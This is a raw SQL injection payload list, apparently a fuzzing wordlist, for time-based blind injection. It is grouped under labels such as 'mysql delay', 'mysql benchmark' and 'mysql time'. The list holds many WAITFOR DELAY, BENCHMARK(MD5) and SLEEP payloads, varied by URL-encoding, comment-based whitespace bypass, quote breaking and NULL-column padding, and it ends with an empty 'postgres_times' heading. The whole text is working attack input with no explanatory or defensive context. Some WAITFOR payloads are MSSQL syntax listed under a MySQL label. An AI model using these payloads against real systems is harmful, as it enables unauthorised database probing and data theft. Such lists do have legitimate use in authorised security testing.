mysql delay---
waitfor delay '0:0:10'--
+waitfor+delay+'0:0:10'--
/**/waitfor/**/delay/**/'0:0:10'--
%20waitfor%20delay%20'0:0:20'--
 waitfor delay '0:0:10'/*
+waitfor+delay+'0:0:10'/*
/**/waitfor/**/delay/**/'0:0:10'/*
%20waitfor%20delay%20'0:0:20'/*
'  waitfor delay '0:0:10'--+
'+waitfor+delay+'0:0:10'--+
'/**/ waitfor/**/delay/**/'0:0:10'--+
'%20waitfor%20delay%20'0:0:20'--+
mysql benchmark -----
 and 0=benchmark(*index*,MD5(1))--
+and+0=benchmark(*index*,MD5(1))+--
/**/and/**/0=benchmark(*index*,MD5(1))/**/--
%20and%200=benchmark(*index*,MD5(1))%20--
 and 0=benchmark(*index*,MD5(1))/*
+and+0=benchmark(*index*,MD5(1))+/*
/**/and/**/0=benchmark(*index*,MD5(1))/**//*
%20and%200=benchmark(*index*,MD5(1))%20/*
' and 0=benchmark(*index*,MD5(1))--+
'+and+0=benchmark(*index*,MD5(1))+--+
'/**/and/**/0=benchmark(*index*,MD5(1))/**/--+
'%20and%200=benchmark(*index*,MD5(1))%20--+
+if(benchmark(*index*,MD5(1)),NULL,NULL))%20/*
+if(benchmark(*index*,MD5(1)),NULL,NULL))%20--
+if(benchmark(*index*,MD5(1)),NULL,NULL))%20%23
'+if(benchmark(*index*,MD5(1)),NULL,NULL))%20/*
'+if(benchmark(*index*,MD5(1)),NULL,NULL))%20--
'+if(benchmark(*index*,MD5(1)),NULL,NULL))%20%23
"+if(benchmark(*index*,MD5(1)),NULL,NULL))%20/*
"+if(benchmark(*index*,MD5(1)),NULL,NULL))%20--
"+if(benchmark(*index*,MD5(1)),NULL,NULL))%20%23
+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL)%20/* 
+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL)%20--
+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL)%20%23
'+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL)%20/* 
'+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL)%20--
'+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL)%20%23
"+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL)%20/* 
"+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL)%20--
"+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL)%20%23
+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL)%20/*
+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL)%20--
+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL)%20%23
'+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL)%20/*
'+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL)%20--
'+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL)%20%23
"+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL)%20/*
"+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL)%20--
"+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL)%20%23
+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
'+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
'+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
'+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
"+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
"+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
"+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
'+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
"+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(*index*,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
mysql time--
'XOR(if(now()=sysdate(),sleep(*index*),0))OR'
sleep(*index*)#
1 or sleep(*index*)#
" or sleep(*index*)#
' or sleep(*index*)#
" or sleep(*index*)="
' or sleep(*index*)='
1) or sleep(*index*)#
") or sleep(*index*)="
') or sleep(*index*)='
1)) or sleep(*index*)#
")) or sleep(*index*)="
')) or sleep(*index*)='
postgres_times---
